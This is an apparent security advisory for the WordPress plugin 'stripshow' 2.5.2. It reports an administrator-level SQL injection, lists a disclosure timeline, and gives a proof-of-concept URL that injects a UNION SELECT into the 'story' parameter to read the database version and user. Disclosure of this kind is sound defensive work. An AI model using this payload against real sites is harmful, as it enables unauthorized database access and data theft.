Plugin Details
Plugin Name: wp-plugin : stripshow
Effected Version : 2.5.2 (and most probably lower version's if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number :
Identified by : Anantshri
Disclosure Timeline
-
December 28, 2013: Vendor Contacted
- January 11, 2014 : Plugin No Change
- May 28, 2014 : Public Disclosure
Technical Details
http://localhost/wp-admin/admin.php?page=stripshow-storylines&action=edit&story=2%20union%20select%201,@@version,user(),4,5
Here the parameter “story” is susceptible. However the risk is limited as this is only possible for administrators.